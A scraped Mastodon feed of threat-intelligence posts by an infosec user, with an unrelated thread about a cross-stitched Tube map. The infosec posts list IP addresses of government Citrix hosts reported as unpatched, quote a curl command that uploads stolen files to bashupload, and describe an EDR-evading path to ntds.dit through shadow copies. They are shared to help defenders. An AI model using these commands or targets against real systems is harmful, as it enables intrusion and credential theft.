Pedro

@pedro@infosec.exchange
10 Followers
103 Following
245 Posts

207.218.103.174,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE
207.218.103.19,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE

If anybody knows anybody at the USG these are still unpatched today and getting owned still.

https://beta.shodan.io/host/207.218.103.19

https://beta.shodan.io/host/207.218.103.174

During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command:
curl bashupload[.]com -T your_file.txt

Notably, Palo Alto highlighted this service in a February report, stating:

"The threat actor stored some of the web shells on bashupload[.]com and downloaded and decoded them using certutil." [1]

Given its use in malicious activity, bashupload[.]com is a domain you may want to consider blocking and/or setting up alerts for any network connections.

[1] https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/

If anybody knows anybody at the US Attorney General's office could they please get them to patch CitrixBleed 2? This one multiple threat actors sat on it.

207.218.103.19,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE

Datadog has a write-up on CVE-2025-48384 in git.

https://securitylabs.datadoghq.com/articles/git-arbitrary-file-write/

CVE-2025-48384: Git vulnerable to arbitrary file write on non-Windows systems | Datadog Security Labs

Learn more about the emerging vulnerability affecting Git.

. @briankrebs has broken the story that the key member (and teenager) of LAPSUS$ runs Scattered Spider

https://krebsonsecurity.com/2025/07/uk-charges-four-in-scattered-spider-ransom-group/

During a recent incident response case, we observed the following file access: \\localhost\C$\@ GMT-2025.06.21-10.53.43\Windows\NTDS\ntds.dit

This is a clever method of accessing a Volume Shadow Copy (VSS) snapshot. Many EDR and detection systems typically monitor for commands such as 'vssadmin list shadows', and may trigger alerts based on their use.

However, by leveraging the "Previous Versions" feature in Windows (see screenshot), attackers can select a snapshot, view its properties, and enter the '@ GMT' path directly in Explorer. This allows them to browse the snapshot's contents without needing to use the command line.

Because this technique doesn't rely on typical shadow copy commands, it may evade detection by your EDR or SIEM solution. You might want to test it in your environment to identify and close this potential detection gap ๐Ÿฆธโ€โ™‚๏ธ๐Ÿฆธโ€โ™€๏ธ

Kingston the red tailed hawk would like to remind you that it's time to pre-order your 2026 Effin' Birds Day-to-Day calendar. Check your local bookstore, or visit https://eatf.art for some online ordering options.

Unit42 has yet another write-up on ClickFix with TTPs and IOCs. Maybe consider blocking Win + R and Win + X. @badsamurai has had good results with this.

https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/

#threatIntel

Fix the Click: Preventing the ClickFix Attack Vector

ClickFix campaigns are on the rise. We highlight three that distributed NetSupport RAT, Latrodectus, and Lumma Stealer malware. ClickFix campaigns are on the rise. We highlight three that distributed NetSupport RAT, Latrodectus, and Lumma Stealer malware.

Unit 42

UK police have detained four members of the Scattered Spider group for the recent attacks against UK retailers Marks & Spencer, Co-op, and Harrods

These arrests are the definition of "don't shit where you eat"

https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods

A step by step guide on how to feed the ACARS Drama Engine with the latest version of the adsb.im image!

https://mike-sheward.medium.com/feed-acars-drama-with-adsb-im-a-step-by-step-guide-a78983f6ed18

#avgeek #acars #vdlm2 #sdr

Feed ACARS Drama with ADSB.im โ€” a step by step guide

The ACARS Drama engine is a glutenous beast. And now, thanks to ADSB.im, you can join the global effort to feed it. ADSB.im is an all-in-one feeder image for single board computers, that allows youโ€ฆ

Medium
ร—

Would you like to see something astonishing?

Recently, a friend gave me a gift that she had been working on for almost a year. It was initially a gift for my 40th, but it took longer to make than she anticipated (BIG UNDERSTATEMENT).

It is - I cannot stress this enough - the coolest and most incredible thing I have ever owned, and I am moved beyond words that someone would put the time in to create something this awesome. For me (!!!).

Here is the London Underground Map... in cross stitch.

Nerds may note that
a) the Vicky line is unfinished (for various reasons, it was PERFECT timing for her to give this to me now, and she will finish that line later, DO NOT even THINK about being a dick and commenting on this when she's made such an incredible thing)
b) the Overground has since been renamed and recoloured (ALL London transport stuff evolves and changes, that is the beauty of it and why I love it - she's annoyed by this but I am not in any way).

It is BREATHTAKING

As I say, I can't put into words how moved I am that somebody would do this just for me. It's powerful and incredible and beautiful, and I will treasure this for the rest of my fucking LIFE. The DETAIL on it. The TIME it took. The SKILL and PATIENCE. I am just so absolutely in awe of her, what a phenomenal thing to do.
Here is a bit more detail. Note that the Liz Line (aka Crossrail) is in sparkly purple because it's my favourite line.
@girlonthenet This is such an amazing gift!
@girlonthenet Cool. I can imagine the time to build the blanket and the tunnels themselves.
@girlonthenet That is a work of heart. Amazing.
@girlonthenet wow. Just wow. That's absolutely stunning!

@girlonthenet

OMFG that is such an amazing and beautiful thing.

@girlonthenet I'm late to the party after being offline for xmas, but that is spectacular. And has anybody already made the โ€˜Liz Line (aka Crosstitchrail)' pun yet?
@OliverClozoff amazing! I think youโ€™re the first ๐Ÿ˜‚
@girlonthenet this is breathtakingly awesome, wow! ๐Ÿ˜

@girlonthenet Itโ€™s just so fucking fantastic! Wow!

Seriously awesome present, what a lovely thing for her to do! ๐Ÿ˜ƒ

@girlonthenet The Elizabeth Line has been re-routed in quite a good way
@girlonthenet I absolutely don't MIND THE GAP in the Vicky line!
(I'll see myself out)
@shom no this is excellent and exactly what we like here, please stay. Pull up a chair ๐Ÿ˜‚
@girlonthenet its a work of art. Kudos to the creator.

@girlonthenet

I love that the inclusion of the Elizabeth line in combination with the overground lines all being orange will actually date this pretty specifically for future nerd-tracers ๐Ÿ˜Š๐Ÿ˜Š

@emma_cogdev YES!! Exactly this!!! โค๏ธ
@emma_cogdev @girlonthenet Also the fact that it doesn't have Brent Cross West on the Thameslink route.
@girlonthenet all london transport maps need to be considered a snapshot of a point in time. nobody complains that a photo is wrong because you changed your shirt.
@girlonthenet
Wow!
That is a brilliant gift, and a huge effort of work!
@girlonthenet OMG that is incredible ๐Ÿ˜
@girlonthenet That is magnificent and clearly a labour of love. I can safely say that I have never seen such a thing and am in absolute awe at the planning, patience and perfectionism that have gone into the making. I'm sure that you will treasure it! And the friendship!
@tompearce49 absolutely on both counts. I am still reeling from the absolute honour that someone would do this for me.
@girlonthenet that is _amazing_, you are loved
@girlonthenet it is magnificent, esp. the sparkly purple Elizabeth Line ๐Ÿ˜
@girlonthenet that is incredible, what an amazing gift!
@NotTheLBCGuy right??? I am just absolutely choked up with emotion that someone would do this for me. Astonishing.
@girlonthenet How wonderful. You deserve it. Happy for you.
@girlonthenet I don't know your friend, but I already love her!
@girlonthenet Holy shit, that's awesome! โค๏ธ๐Ÿฅฐโค๏ธ